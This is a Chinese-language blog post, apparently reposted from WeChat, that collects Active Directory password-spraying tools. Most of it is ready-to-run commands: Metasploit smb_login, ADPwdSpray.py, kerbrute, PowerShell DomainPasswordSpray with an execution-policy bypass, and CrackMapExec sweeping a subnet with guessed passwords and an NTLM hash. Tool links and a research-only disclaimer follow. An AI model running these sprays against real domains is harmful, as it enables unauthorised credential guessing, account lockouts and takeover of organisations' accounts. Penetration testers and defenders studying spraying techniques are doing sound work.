先是MSF的,设置大体如下:
use auxiliary/scanner/smb/smb_login
set rhosts 192.168.183.128
set USER_FILE /../../
set SMBDomain enginge.com
执行效果如下
aad3b435b51404eeaad3b435b51404ee:d787e3fddeee1d2dce38ed5d7d6b7226
执行效果如下
EnumADUser.py 192.168.1.1 test.com user.txt tcp
ADPwdSpray.py 192.168.1.1 test.com user.txt clearpassword DomainUser123! tcp
ADPwdSpray.py 192.168.1.1 test.com user.txt ntlmhash e00045bd566a1b74386f5c1e3612921b udp
但是其脚本存在一些问题
ADPwdSpray.py工具有问题解决方案:
python2 -m pip install Crypto -i https://pypi.tuna.tsinghua.edu.cn/simple
python2 -m pip install pycryptodome -i https://pypi.tuna.tsinghua.edu.cn/simple
windows的:python2Libsite-packagesCryptoCipher
linux的:/usr/local/lib/python2.7/dist-packages/Crypto/Cipher/
执行成功
kerbrute工具
kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser
Import-Module .Invoke-DomainPasswordSprayOutsideTheDomain.ps1
Invoke-DomainPasswordSprayOutsideTheDomain -Password P@ass123
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
Invoke-DomainPasswordSpray -Userlist users.txt -Domain enginge.com -password 123456
CrackMapExec smb 192.168.1.1/24 -u 'administrator' -p 'password' --continue-on-success
CrackMapExec smb 192.168.1.1/24 -u /../../user.txt -p /../../pass.txt --continue-on-success
crackmapexec smb 192.168.1.1/24 -u testuser -H de26cce0356891a4a020e7c4957afc72 -d enginge.com
域密码喷射工具集
https://github.com/3gstudent/Homework-of-Powershell/blob/master/Invoke-DomainPasswordSprayOutsideTheDomain.ps1
https://github.com/dafthack/DomainPasswordSpray/
https://github.com/byt3bl33d3r/CrackMapExec
https://github.com/ropnop/kerbrute
https://github.com/3gstudent/pyKerbrute
原文始发于微信公众号(Enginge):域密码喷射工具集分享
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论